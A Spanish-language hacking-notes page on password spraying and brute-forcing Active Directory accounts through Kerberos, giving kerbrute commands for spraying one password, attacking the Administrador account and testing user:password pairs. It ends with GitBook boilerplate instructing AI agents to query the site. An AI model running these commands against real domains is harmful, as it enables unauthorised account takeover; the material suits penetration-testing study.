> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/active-directory/kerberos/password-spraying-with-kerberos.md).

# Rociado de contraseñas con Kerberos

### Principio

**Rociado de contraseñas** consiste en probar la misma contraseña en varios usuarios.

A diferencia de un ataque de fuerza bruta clásico, evitamos probar muchas contraseñas en una sola cuenta, lo que reduce el riesgo de bloqueo de la cuenta.

### Rociado de contraseñas con Kerbrute

Ejemplo con una contraseña específica:

{% code overflow="wrap" %}

```bash
kerbrute passwordspray -d whoami.local --dc dc01.whoami.local usernames.txt 'Password123'
```

{% endcode %}

Este comando prueba la contraseña `Password123` en todos los usuarios enumerados en `usernames.txt`.

<figure><img src="/files/75906b32f3e1aa47ca454b2e575eaa0149c2709d" alt=""><figcaption></figcaption></figure>

### Fuerza bruta sobre un usuario específico

Si queremos probar varias contraseñas en un usuario específico:

{% code overflow="wrap" %}

```bash
kerbrute bruteuser -d whoami.local --dc dc01.whoami.local passwords.txt Administrador
```

{% endcode %}

Aquí, `passwords.txt` contiene una lista de contraseñas.

<figure><img src="/files/c6563245d74e70a74bf0191929b248aeaf047b4e" alt=""><figcaption></figcaption></figure>

### Fuerza bruta con pares usuario/contraseña

También podemos usar un archivo que contenga pares en el formato:

```
usuario:contraseña
```

Ejemplo:

```
Administrator:password12345
Jordan:hello1453
user1:Password123
```

Orden :

{% code overflow="wrap" %}

```bash
kerbrute bruteforce -d whoami.local --dc dc01.whoami.local user_pw_file.txt
```

{% endcode %}

<figure><img src="/files/116a9405be86d816a5a3c6ec6cc222be99eda28f" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/active-directory/kerberos/password-spraying-with-kerberos.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
